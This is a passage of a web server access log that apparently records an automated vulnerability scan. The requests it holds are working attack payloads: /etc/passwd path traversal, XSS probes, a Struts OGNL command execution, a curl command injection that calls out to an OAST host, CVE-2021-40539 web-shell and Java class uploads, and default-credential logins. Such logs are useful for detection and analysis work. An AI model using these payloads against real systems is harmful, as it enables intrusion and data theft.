{queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/firewall.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.169","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/networking/get_netcfg.php?iface=;curl%20http://ca285tosmpvbafqg07h0grwra48pwbt56.oast.fun/`whoami`; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 